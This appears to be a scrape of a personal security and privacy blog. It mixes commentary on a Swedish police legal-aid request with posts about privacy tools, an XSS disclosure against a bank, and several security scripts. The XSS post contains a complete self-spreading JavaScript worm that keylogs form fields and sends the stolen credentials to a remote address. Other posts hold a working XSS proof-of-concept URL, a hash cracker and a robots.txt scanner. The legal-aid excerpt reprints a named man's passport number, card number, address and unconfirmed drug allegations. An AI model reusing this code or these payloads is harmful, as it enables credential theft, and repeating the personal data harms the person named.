“The case is of Swedish national interest due to the very extensive character of the intrusion. The preliminary investigation involves Swedish authorities such as the Swedish Prosecution Authority, the National Bureau of Investigation (Police), the Stockholm Regional Investigation Unit (Police) and the Swedish Security Service (Security Police). […] The accessed data may cause considerable damage to authorities, companies and individuals. The intrusion handled by the on-going criminal investigation is probably the most serious suffered by Swedish IT-systems linked to public authorities. […] The analysis of the intruded mainframe computer makes it evident that an IP-number connected to Cambodian Internet Service Providers/Hosting Services have been used for part of the criminal intrusions, including extensive copying of sensitive data from the mainframe computer.”

This writing covers the Swedish government’s legal aid request which you can read in PDF format here.

The Swedish government’s request for legal assistance again proves that the kidnapping had nothing to do with TPB. The trial conviction was a cheap flag for Interpol to wave so that the Cambodian authorities would act, unlike how they usually go “meh” over internationally wanted pedophiles and murderers hiding in the region.

4th October, while the prosecution spokesperson told the media that this circus was due to TPB, Cyrus Farivar wrote in an article published by Ars Technica: Femerstrand also accused the Swedish Security Service of conducting surveillance of Svartholm Warg in Cambodia, “since [at least] March 2012.” (The Swedish Security Service did not reply to our request for comment.) How did I know? They were checking me out too. They visited me in restaurants and documented what I was eating, they photographed the house that I lived in and they filmed me taking out my garbage. Spotting agents is sometimes easy, and probably much easier in Phnom Penh; they don’t blend in. They must’ve sent rookies to Cambodia, I mean we’re talking Hawaii shirts, straw hats and sunglasses. Reading about myself in the intel on Gottfrid as “one or more Swedish hacktivist in Cambodia ” confirms my previous suspicions that they did their homework about me.

Evidence in the case has been gathered from equipment seized from the suspects’ possessions, Pastebin, Ubuntu One, Passagen and IRC (primarily EFNet). Two computers seized from one of the suspects were, according to the lawsuit, encrypted and could not be analyzed by forensics personnel. A few individuals living in Sweden have been visited by Swedish Police agents and had equipment seized and forced to sit in hearings with IT forensics staff simply for having online contact with suspects in the case. Several friends who had IRC contact with Gottfrid have noticed hacking attempts on their machines that were traced back to Swedish police agencies. It appears safe to claim that the current police tactic is to throw rocks in the water to observe which rings form.

The Swedish government’s panic request for legal assistance claims that the alleged data breaches, when added together, is historically the most dangerous one targeting the Swedish government – ever. Interestingly enough the media hasn’t dared mentioning it despite it being said in the lawsuit that the machines that were used by the attackers to hack the Swedish Nordea bank (which spent over 10 billion SEK on their secure systems) were in fact owned by the Swedish Parliamentary Administration and the Swedish National Police, which is supposedly also entirely hacked. What should be more interesting to discuss than how somebody allegedly tries to increase some integers in database row columns is how somebody allegedly gained full control of a country’s most important infrastructural parts and not be noticed for two years.

The question regarding whether Gottfrid did or did not attempt to transfer money to his bank account is highly irrelevant. What’s actually interesting in this case is that no matter if Gottfrid is guilty or innocent the Swedish government is right now standing bent over with their pants down saying somebody took control of their most critical systems and they didn’t even notice it for two years, despite somebody taking full copies of the data. These obviously existing security issues are not limited to Sweden. The customers of computer systems, both in the public and private sector, are all purchasing IBM products. IBM mainframes are ranked most secure in the world. Regardless of whether Gottfrid is guilty or innocent the fact remains: somebody has broken the systems on which shoulders all society critical elements stand: governments and banks.

The digitalization of our entire society has been proved to be broken, is the world ready to discuss that or do you want to continue debating the morals of stealing money on a bank mainframe? Open your eyes, the entire world just broke down and a lonesome bearded supposed drug addict is the alleged mastermind. In your face, Sweden.

Tor node gets raided

In June 2012 the Swedish International Public Prosecution Office requested legal aid from Germany to retrieve all data related to IP 217.13.197.5 after it had been discovered that it was used to connect to Logica mainframes. The Berlin police agency raided the address and the IP owned by Speedbone Internet & Connectivity. The server turned out to be a Tor exit node and no information could be retrieved about any users. No evidence was found during the raid and nothing was seized. The mainframe accessed stored big amounts of personal and financial data for the Swedish tax agency. Big amounts of data stored on systems used by the Prosecution Office and police authorities were also accessed and downloaded.

No evidence from Leaseweb

In September 2012 the Swedish International Public Prosecution Office requested legal aid from Germany to retrieve all data related to IP 46.165.196.182. The customer that rented the server could never be found since the service had been terminated a long time before the request arrived and Leaseweb did not keep customer data.

The info below is from the PDF linked in the top and not my personal words.

Detailed information of suspect (12 July 2012)

National Bureau of Investigation
Cyber Crime Unit
Richard Ahlgren

Family name: SVARTHOLM WARG
Forename: Per Gottfrid
Sex: Male
Date of birth: 17/10/1984
Nationality: Sweden

Passport
Passport number: 23810667
Date of issue: 28/01/2003
Place of issue: Stockholm, Sweden
Expiry date: 28/01/2013

Description (dated 26/05/2011)
Height: 175 cm
Eye colour: Blue
Skin colour: Fair skinned
Hair colour: Medium blonde

Links to Cambodia
In September 2011 the trials concerning The Pirate Bay started in the Svea Court of Appealing. Gottfrid Svartholm Warg was not present and it was told that he was in Phnom Penh, Cambodia. He posted a medical certificate, written in Khmer, to his attorney stating that he suffered from some kind of illness.

According to an article 2009 on the blog of the travel writer Adam Bray, Svartholm Warg had lived for a time in an apartment on top of the Cadillac Bar & Grill in Phnom Penh.

This article also said that Svartholm Warg was the owner of the company Estoy Ltd. Seychelles IBC in Phnom Penh. When he registered the company’s website he stated the phone number +855 929 607 72 (Cambodian number).

In chat logs from the IRC network Svartholm Warg posted in 2009 and 2010 that he was operating from Cambodia. For instance he wrote that he uses the border crossing at Poipet from Thailand to Cambodia.

Driving license
In the seizure from the current investigation a picture of Gottfrid Svartholm Warg’s Cambodian driving license was found. The picture is attached to this document.
Card code: A1.000034
Issue date: 21/01/2009
Address of Svartholm Warg: 4 St. 104 Wat Phnom, Daun Penh

IP information
In chat logs from the investigation Svartholm Warg has been logged on from IP-numbers pointing to Cambodia. These IP-numbers with timestamps are:

124.248.174.161 unknown time Cogetel Online
124.248.167.191 25/03.2012 2015 (UTC 0) Cogetel Online
124.248.187.150 10/03/2012 12:42 (UTC 0) Cogetel Online
124.248.187.22 04/03/2012 16:11 (UTC 0) Cogetel Online

Other IP-numbers pointing to Cambodia in the investigation are:

203.176.141.205 10/03/2012 01:00 (UTC 0) Mekongnet
27.109.118.33 10/03/2012 19:30 (UTC 0) DTV Starnet

Credit card number
A credit card number with the name Gottfrid Svartholm was found in the investigation.
Number: 4111 3418 0000 2947
Expiry date: 12/10
Name: Gottfrid Svartholm
Issuing bank: Acleda Bank PLC, Cambodia

Intelligence information
The information about Svartholm Warg that follows is to be seen as unconfirmed intelligence information:
- he is a drug addict and a frequent user of marijuana and crystal meth
- he is in very bad shape and may have spent time in hospital recently
- he has earlier or recent rented a house in Cambodia from an unknown American citizen
- he may have contact with one or more Swedish hacktivist in Cambodia
- he (and his network) may have access to at least one Internet Service Provider in Cambodia. That ISP is Cogetel.
- he (and his network) may have access to the mail account of the Mayor of Phnom Penh

Request for assistance

Cyber Crime Unit
Richard Ahlgren

Dear colleagues,

The Swedish National Bureau of Investigation is currently involved in a Cyber Crime investigation concerning a serious computer intrusion. In this investigation we request assistance from the Cambodian Police.

Preamble
The criminal offence being investigated is a very serious case of breach of data secrecy according to the Swedish Penal Code Chapter 4, Section 9c. The case is of Swedish national interest due to the very extensive character of the intrusion. The preliminary investigation is handled by several Swedish authorities such as the Swedish Prosecution Authority, the National Bureau of Investigation, the Stockholm Regional Investigation Unit and the Swedish Security Service.

Suspects
Two suspects have been detained during part of the preliminary investigation and we would appreciate your help with a third one. All suspects are Swedish citizens. The third suspect is:

Family name: SVARTHOLM WARG
Forename: Per Gottfrid
Date of birth: 17/10/1984
Sex: Male

Gottfrid Svartholm Warg is suspected for a breach of data secrecy together with others, on numerous occasions during the period January 1 2012 to April 15 2012. There has not yet been application for a detention order.

Svartholm Warg is international wanted (Interpol file number 2012/318024) in another case as a result of an imposed sentence of 1 year imprisonment in the Svea Court of Appeal 17/04/2009. The diffusion is attached.

His present location is unknown though we believe that he lives in Phnom Penh, Cambodia. See more detailed information in the attached files.

Case details
Intrusions have been made against, inter alia, a mainframe computer operated by a private company, hosting large amounts of personal data/census data from the Swedish Tax Agency, including protected personal data, as well as data of financial nature. Large amounts of data from the Enforcement Authority and the Police have been accessed as well.

The accessed data may cause considerable damage to authorities, companies and individuals.

The intruion handled by the on-going criminal is probably the most serious suffered by Swedish IT-systems linked to public authorities.

Requested assistance
Our request concerns investigative assistance locating the suspect Gottfrid Svartholm Warg. Furthermore we would like assistance with surveillance of the suspect with the purpose of documenting and analyzing his activities, contacts and locations.

In order to locate the suspect, see the attached document with detailed information. There you can find information about, inter alia, IP-addresses, credit card number, driving license and intelligence information. We have tried to collect and analyse information about his specific whereabouts but we cannot come any gfurther. We now need your assistance.

When the suspect has been located the intention of the prosecutor in this case, Senior Public Prosecutor Henrik Olin, is to file a Rogatory Request concerning a search warrant. In addition to the arrest of Svartholm Warg we would like to seize his computers, mobile phones, hard drives, other digital storage media and personal belongings that can be used as evidence in our case. If necessary and if possible Swedish police officers can assist in the house search.

HAND OVER RECORDS

Evidence number Description
1 Hard Drive Seagate 80 G
2 Hard Drive Hitachi 80 G
3 USB Stick
4 USB Stick
5 USB Stick
6 Memory Card
7 Wireless Access Point
8 Pärm
9 3G Dongle With Sim Card
10 Modem Zon
11 Sim Card Tele2
12 Plastic Cover belonging to a Switch
13 Paper With Addresses
14 Business Card
15 Paper From EuroBank
16 Bagage Tag
17 Receipt
18 IPhone
19 Nokia Phone
20 Invoice for MacBook
21 Note Book
22 Bankbook
23 Bankbook
24 Bankbook
25 Passport
26 MacBook
27 Plastic Cover belonging to a Router
28 Surveillance Camera, CCTV
29 16 Home Burned CDs
30 Lock Picking Tools
31 Modem Online
32 Key
33 Key

“The case is of Swedish national interest due to the very extensive character of the intrusion. The preliminary investigation involves Swedish authorities such as the Swedish Prosecution Authority, the National...

Roundcube is a popular open source IMAP webmail application. Roundcube is used by Harvard University, UC Berkeley and University of Michigan. Apple Mac OS X 10.7 uses Roundcube per default in its Mail Server. While writing this a lazy Google dork estimates 133 000 public Roundcube installations.

PGP support was first requested seven years ago and set critical six years ago. PGP support has been requested actively ever since. One of the core developers began the development of his PHP implementation, the Enigma plugin, two years ago but the plugin has not been made functional yet.

Today I am proud to release a beta version of my Roundcube plugin that implements PGP using the OpenPGP.js (based on GPG4Browsers) JavaScript library. rc_openpgpjs enables OpenPGP to function in the user’s browser so that fundamental key storage security isn’t immediately broken by design, in opposite to the official Enigma plugin.

At its current beta stage; rc_openpgpjs is able to generate an encryption key pair, save it in HTML5 web storage (in your own browser, guys) and perform encryption and decryption of email. rc_openpgpjs works in any modern browser that can parse HTML5 and supports the window.crypto object. Unfortunately this is limited to Google Chrome today, but Mozilla is struggling working on it.

rc_openpgpjs is available on Github. rc_openpgpjs will become stable as soon as some small glitches have been corrected. It has been written for Roundcube 0.8.4 with the Larry skin.

Roundcube is a popular open source IMAP webmail application. Roundcube is used by Harvard University, UC Berkeley and University of Michigan. Apple Mac OS X 10.7 uses Roundcube per default...

Linux has DM-CRYPT, FreeBSD has GEOM_ELI and Oracle is holding ZFS encryption options closed source. The incompatible nature of encrypted storage throughout various UNIX systems is an obvious problem. TrueCrypt supports most popular platforms but until now there hasn’t been a simple way to organize and maintain TrueCrypt containers over different types of systems. TrueCrypt Volume Manager aims to be this bridge.

TrueCrypt Volume Manager, shortened TCVM, is a UNIX shell environment written in Python. It provides a simple CLI shell interface to easily create, mount, unmount and list containers and also the possibility to easily change the passphrase of a given encryption container. Since TCVM is intended to run as a UNIX shell this allows you to securely administrate your TrueCrypt containers over the SSH protocol.

TCVM also provides the function to automatically generate secure passphrases for TrueCrypt containers and store the passphrases in a separate container. This function is fully optional to use and is essentially inspired by the KeePass project. TCVM flexes a custom wrapper for TrueCrypt.

Please note that TCVM is still new and may be slightly rough around the edges. I am happy to fix any issue you may encounter.

The project is available on Github.

Linux has DM-CRYPT, FreeBSD has GEOM_ELI and Oracle is holding ZFS encryption options closed source. The incompatible nature of encrypted storage throughout various UNIX systems is an obvious problem. TrueCrypt...

panic_bcast is a network protocol panic button operating decentralized through UDP broadcasts and HTTP. It’s intended to act a panic button in a sensitive network making it harder to perform cold boot attacks. A serious freedom fighter will run something like this on all nodes in the computerized network.

How it works

1. An activist has uninvited guests at the door
2. The activist sends the panic signal, a UDP broadcast, with panic_bcast
3. Other machines in the network pick up the panic signal
4. Once panic_bcast has picked up the panic signal it kills truecrypt and powers off the machine.

panic_bcast was written with the intention to support any form of UNIX that can run Python. It has been tested successfully on Linux and FreeBSD.

To trigger the panic signal over HTTP simply request http://…:8080/panic from a machine that is running panic_bcast. Whichever will do.

Please note that panic_bcast is a beta and more sophisticated ways to prevent cold boot attacks are planned. You can view these plans by searching for the word “TODO” in the source code.

The source code is available on Github.

Remember kids: there’s no home for swap in opsec.

panic_bcast is a network protocol panic button operating decentralized through UDP broadcasts and HTTP. It’s intended to act a panic button in a sensitive network making it harder to perform...

DNSDH is a protocol for exchanging cryptographic keys using the Diffie-Hellman algorithm. Instead of exchanging keys traditionally, the clients speak to a bogus DNS server to initiate an encrypted session in an existing channel of communication. The cryptographically relevant packets travel through a data path that appear to be normal domain name resolve queries to remain stealth and effective even behind limited and surveillanced networks. Please understand that the DNS server is only pretending to be a server for performing name lookups by using its language but performing different tasks.

The bogus DNS server is the center of the key exchange. It uses memcached to store data in memory and deletes any output after it’s been delivered to its recipient. The point of DNSDH is to establish a reliable network enabling anything that can perform a DNS request to exchange cryptographic keys using discrete bogus domain name queries. The nodes communicating, Alice and Bob, could possibly be two cellphones, IRC clients or even death stars. It’s also a great blast to teasingly merge cryptographic key exchanges with traffic that is rarely looked at by network administrators unless they want to censor or monitor you.

When initializing the session Alice first declares the values of p, g and Alice’s private key (alice_private) and then queries the bogus DNS server with dnsdhinit.p.g.alice_public. The DNS server creates a sessionid and stores it in the memory with the data provided in Alice’s query. Alice tells Bob that she wants to talk privately and sends him a packet containing the sessionid provided by the DNS server. Bob queries the DNS server with the sessionid recieved from Alice. The DNS server replies with the information provided in Alice’s query. Bob then proceeds by declaring his own private key (bob_private) and calculates the value of his public key: g^bob_private mod p. Bob can then calculate the secret he shares with Alice: alice_public^bob_private mod p. Then Bob queries the DNS server with dnsdhinit.bob_public, receives an id and sends it to Alice in a packet. Alice then queries the DNS server with the id, receives bob_public and calculates the secret she shares with Alice: bob_public^alice_secret mod p.

Alice

$ ./client.example.pl 1337 1338 init
[+] Generating keys...
[+] alice_pub_key: 7
[+] alice_priv_key: 19
[+] Query dnsdhinit.23.5.7
[+] SEND DNSDH_INIT: 6035559
[127.0.0.1:58602]: DNSDH_FINISH: 9300804
[+] Query sessionid.9300804
[+] p: 23
[+] g: 5
[+] bob_public: 1
[+] Shared secret: 1

Bob

$ ./client.example.pl 1338 1337
[127.0.0.1:60267]: DNSDH_INIT: 6035559
[+] Query sessionid.6035559
[+] p: 23
[+] g: 5
[+] alice_public: 7
[+] Generating keys...
[+] bob_pub_key: 1
[+] bob_priv_key: 0
[+] Shared secret: 1
[+] Query dnsdhinit.1
[+] SEND DNSDH_FINISH: 9300804

Source code

The source code is available on Github.

DNSDH is a protocol for exchanging cryptographic keys using the Diffie-Hellman algorithm. Instead of exchanging keys traditionally, the clients speak to a bogus DNS server to initiate an encrypted session...

Overview
Skandinaviska Enskilda Banken AB (SEB) is a Swedish financial group for corporate customers, institutions and private individuals with headquarters in Stockholm, Sweden. Its activities comprise mainly banking services, but SEB also carries out significant life insurance operations and also owns Eurocard. The bank was founded by and is controlled by the powerful Swedish Wallenberg family through their investment company Investor AB.

Problem
Page frame contents are decided by unsafely handled url parameters leaving the cms software globally vulnerable to xss attacks. Vulnerable domains are sebgroup.com, seb.no, seb.fi, seb.ua, seb.pl, seb.lt, seb.se and any other domain hosting the vulnerable cms. Customers may have illegitimate third party scripts executed on their computer or be subject to login credential theft and keylogging.

Proof of concept

http://www.seb.se/pow/wcp/top.asp?lang=se&website=%54%41%42%32%22%3e%3c%2f%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%77%61%7a%7a%75%70%27%29%3c%2f%73%63%72%69%70%74%3e

Timeline
2011-12-05: Vulnerabilities discovered
2012-01-12: Contacted SEB
2012-01-18: Received response (Computer Security Incident Response Team)
2012-01-19: SIRT notified
2012-01-23: Received arrogant response by SIRT (“we knew, thanks anyway”)
2012-02-09: Vulnerabilities patched

Overview Skandinaviska Enskilda Banken AB (SEB) is a Swedish financial group for corporate customers, institutions and private individuals with headquarters in Stockholm, Sweden. Its activities comprise mainly banking services, but...

In this post I will introduce you to undiscovered usages of an XSS, and also demonstrate how to transform a non-persistent XSS to a persistent and make an actual practical threat. Cross site scripting attacks are listed as number two on OWASP’s top 10 list of application security risks year 2010, and I wouldn’t expect those numbers to drop anytime soon.

The used attack vectors of an XSS are quite simple:

1. Attacker injects code into data which the server reflects, other users visit the page where the malicious code is displayed and get their cookies stolen.
2. Attacker injects code into request parameters that the server reflects, sends infected URI to the victim user whose cookie is stolen.
3. Attacker injects code that exploits unknown web browser vulnerability to install malware on the users computer into request parameters that is somehow (either through number one or number two) executed by the user.
4. Attacker injects malicious login form and performs a phishing attack on the victim.

That’s pretty much it. When an XSS is demonstrated, persistent or not, a researcher will throw a JavaScript alert() message or inject a cookie stealer. In the eye of the unconscious developer of the site, your alert() doesn’t mean anything. Fake JavaScript page defacements don’t mean a thing either. “Oh, you can give me a warning? Good for you.” The only time they will act is when your injection can somehow mess up the way the page looks. And not because it’s a security risk, but because it’s messing up their layout.

Nobody cares about stolen cookies. And why would they? Cookies are not the issue. It’s common praxis to require re-authentication, like password input, besides session values to change things that will affect requiring new session values: new e-mail address, new password, etc. In truly sensitive systems cookies should be bound to the user’s IP address, and if the attacker has local access to the victim’s IP address there are so many attack possibilities that the cookie isn’t the victim’s largest problem.

I believe that it’s safe to assume that the popularity of unpatched XSS vulnerabilities is due to warnings about nonthreatening threats. “Hey man, check this out. I totally just alert(‘hax’):ed your site locally in my own browser without affecting anybody!” Nobody is going to take that seriously.

Keep in mind that there’s a huge differentiating detail between a vulnerable GET and POST parameter. For logical reasons web browsers perform GET requests by default, and maliciously getting a user to submit something with an infected POST parameter is (“should” be) harder than giving them a link.

Broadening the scope of an XSS attack

As a demonstration of what JavaScript is truly capable of when used for malicious purposes, I have written a self aware virus that infects links and forms (href and action attributes) with its own payload when an infected victim’s web browser renders the page. The virus looks for a query parameter containing \%3c\%73\%63\%72\%69\%70\%74 (<script) in the query of an URI and then infects the target destinations with itself so that it’s kept for a longer period than just the one page the user is viewing. It should logically always find at least one occurrence of itself, otherwise it wouldn’t execute to begin with.

This way, the virus spreads through transformation from a non-persistent XSS injection to a semi-persistent. It exercises worm-like behavior; not in the sense of spreading user->user, but page->page. It is, however, user borne if infected links are copied between multiple users. By infecting action attributes of form elements the infection is also active after the user has executed a login or logout, unless the web server performs a redirect to an uninfected URI.

Wonderfully enough, it’s possible to pass any GET parameters with any value you want to an httpd without breaking anything. You could GET http://www.nsa.gov/?bat=man without breaking anything, unhandled parameters are completely ignored. Thus our virus can be very aggressive about infection: the infected victim wouldn’t tell a difference either way. It’s quite unrare that a vulnerable CMS or MVC will allow the same vulnerable parameter to be passed to any visually rendered part of the site. Remember American Express?

Either way, login credentials are sent to a remote location controlled by the attacker. All form elements are hooked up with a keylogger. By default, the virus makes HTTP requests to an URI controlled by the attacker, and requests the logged information making it show up in logs like GET /username=foo,password=bar It is very easy to hook it up with additional sniffing, e.g. parsing the rendered website for credit card information.

It’s written to be entirely independent of bloated JavaScript libraries and plugins to keep it as light weight as possible at execution. It’s still an educational proof of concept though, and some bugs are intentionally left unfixed.

// Inject param=payload into target
function inject(target, param, payload)
{
  if(!target.match("\\?"))
    return target + "?" + param + "=" + payload;
  return target + "&" + param + "=" + payload;
}

// Sends data to remote location
function snatch(data)
{
  var i = document.createElement("img");
  i.src = "http://127.0.0.1/" + data;
}

window.onload = function()
{
  window.location.toString().match(/\?(.+)/);
  var query = RegExp..split("&");

  for(i = 0; i < query.length; i++)
  {
    var tmp = query[i].split("=");
    var unescaped = unescape(tmp[1]);
    var payload = "";

    for(x = 0; x < unescaped.length; x++)
      payload += '%' + unescaped.charCodeAt(x).toString(16);

    // Found self
    if(payload.match("\%3c\%73\%63\%72\%69\%70\%74"))
    {
      var param = tmp[0];
      break;
    }
  }

  // Infect href elements
  var links = document.getElementsByTagName("a");
  for(i = 0; i < links.length; i++)
    links[i].href = inject(links[i].href, param, payload);

  var forms = document.getElementsByTagName("form");
  for(i = 0; i < forms.length; i++)
  {
    // Infect action elements
    document.forms[i].action = inject(forms[i].action, param, payload);

    // Initialize keylogger
    document.forms[i].onsubmit = function()
    {
      var logged = new Array();
      for(x = 0; x < this.elements.length; x++)
        if(this.elements[x].type != "submit")
          logged[x] = this.elements[x].type + "=" + this.elements[x].value;
      snatch(logged);

      return true;
    }
  }
}

UPDATE: The method of spreading was first introduced in the BeEF framework

In this post I will introduce you to undiscovered usages of an XSS, and also demonstrate how to transform a non-persistent XSS to a persistent and make an actual practical...

BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.

It works way better than it ever should.

BozoCrack was originally written in Ruby and published on GitHub by juuso. I liked the idea, and figured I’d do a PHP port:

<?php
/**
 * BozoCrack is a depressingly effective MD5 password hash
 * cracker with almost zero CPU/GPU load. Instead of
 * rainbow tables, dictionaries, or brute force, BozoCrack
 * simply finds the plaintext password. Specifically, it
 * googles the MD5 hash and hopes the plaintext appears
 * somewhere on the first page of results.
 *
 * Original BozoCrack can be found on https://github.com/juuso/BozoCrack
 *
 * Ported from Ruby to PHP by Niklas Femerstrand, qnrq.se, 2011
 * License: http://sam.zoy.org/wtfpl/
 */

if(!isset($_SERVER['argv'][1]))
  die("Usage example: $ php bozocrack.php file_with_md5_hashes.txt\n");

$fileContents = file_get_contents($_SERVER['argv'][1]);
preg_match_all("/\b([a-fA-F0-9]{32})\b/", $fileContents, $hashes);
$hashes = array_unique($hashes[0]);
printf("Loaded %s unique hashes\n", count($hashes));

foreach($hashes as $hash)
{
  $response = file_get_contents("http://www.google.com/search?q={$hash}");
  $wordlist = preg_split("/\s+/", $response);
  foreach($wordlist as $word)
  {
    if($hash == md5($word))
    {
      printf("%s:%s\n", $hash, $word);
      break;
    }
  }
}

BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it...

Let’s talk a bit about a very common topic which is widely discussed whenever secure communication is brought up: encrypted emails. People often wonder what the best way to talk securely is through email. Hushmail is a popular service, if you haven’t heard of it then look it up. The problem with Hushmail is that people believe that it’s secure. Searching for them on Twitter brings up tweets written by groups such as Anonymous and the recent Occupy Wall Street inspired subcultures. The problem with most Hushmail users is that they believe that they are secure, either because they have no idea of what they’re relying on or because they didn’t read what they’re told. Hushmail has, like the marketing genious it is, after all, never really claimed to be secure. At least not if you dig around a bit and actually read what they’re saying. You don’t have to be a rocket scientist to see a monetary interest in not printing such information directly in your face, but instead build a security facade with keyhole images all over the place. The problem is that people haven’t done their homework.

As we all know, and South Park beautifully illustrated in its “Human Centipad” episode, users don’t read user agreements. Ever. The time has come to do so. A snippet from Hushmail’s privacy policy reveals that:

“Hush restricts user information and has protocols that allow only specific employees to have access to the user database itself.”

Man, I love buzzwords… Continuing: “Hushmail does not put you above the law”:

“We are committed to the privacy of our users, and will absolutely not release user data without an order that is legally enforceable under the laws of British Columbia, Canada, which is the jurisdiction where our servers are located. In addition, we require that any such order refer specifically to the account for which data is required.

[snip]

That means that there is no guarantee that we will not be compelled, under an order enforceable under the laws of British Columbia, Canada, to treat a user named in an order differently, and compromise that user’s privacy.”

A trip down Hushmail’s memory lane reveals that it handed over 12 CDs of decrypted emails to the US authorities, but that’s not really worth going further into. Let’s just conclude that it’s entirely possible.

The moral of the story is that you’re trusting a service with your private communication which promises to not release any data to governments unless they explicitly ask for it through Canadian law as proxy. The same governments that already passed mass surveillance laws which are probably at least a tad reason of why you want to secure your digital communication to begin with. For all we know, they might already have politely asked Hushmail and similar services to install backdoors which they could use whenever. You lose, but please don’t forget to insert all your coins and play again.

Let’s talk a bit about a very common topic which is widely discussed whenever secure communication is brought up: encrypted emails. People often wonder what the best way to talk...

Due to the recent scandal of American Express listing their publicly available admin debug panel in their robots.txt file, here’s a sloppy proof of concept that can be used to find similar security issues.

Remember:

• robots can ignore your /robots.txt. Especially malware robots that scan the web for security vulnerabilities, and email address harvesters used by spammers will pay no attention.
• the /robots.txt file is a publicly available file. Anyone can see what sections of your server you don’t want robots to use.

http://www.robotstxt.org/robotstxt.html

Either way, a location such as /us/admin/ would be in any wordlist of interesting locations and you should always protect sensitive parts of your system with authorization requirements.

<?php
/**
 * Quick hack to determine HTTP status codes of locations listed in a host's
 * robots.txt file.
 * Author: Niklas Femerstrand, qnrq.se, 2011
 * License: http://sam.zoy.org/wtfpl/
 */

// Determine HTTP status code of $file on $host
function httpstatus($host, $file) {
   $fp = fsockopen($host,80,$errno,$errstr,30);
   $out = "GET /$file HTTP/1.1\r\n".
          "Host: $host\r\n".
          "Connection: Close\r\n\r\n";
   fwrite($fp,$out);
   $response = fgets($fp);
   return chop($response);
}

if (!$argv[1])
	die("usage: $ php robotscan.php <host>\n   eg: $ php robotscan.php www.google.com\n");

$host = preg_replace("/\/$/", "", $argv[1]);
$target_url = $argv[1] . "/robots.txt";

$filters = array("/[ ]?Allow:[ ]?/",
                 "/[ ]?Disallow:[ ]?/",
                 "/[ ]?Sitemap:.*/",
                 "/[ ]?Request-rate:.*/",
                 "/[ ]?Crawl-delay:.*/",
                 "/[ ]?Visit-time:.*/",
                 "/.*[$*].*/",
                 "/User-agent: .*/",
                 "/#+.*/");

echo "[+] Getting robots.txt content\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}/robots.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
$robots = curl_exec($ch);

if(!$robots)
{
	$httpStatus = httpstatus($host, "robots.txt");
	if(preg_match("/200 OK/", $httpStatus))
		die("[-] robots.txt exists but seems empty\n");
	else
		die("[-] {$httpStatus}\n");
}
elseif(preg_match("/([\<])([^\>]+)*([\>])/i", $robots))
	die("[-] robots.txt is incorrectly formatted (html?)\n");
else
{
	$robots = preg_replace($filters, "", $robots);
	$robots = preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $robots);
	$arr = explode("\n", $robots);

	foreach($arr as $loc)
		printf("[+] %s: %s\n", "{$host}{$loc}: ", httpstatus($host, $loc));
}

Due to the recent scandal of American Express listing their publicly available admin debug panel in their robots.txt file, here’s a sloppy proof of concept that can be used to...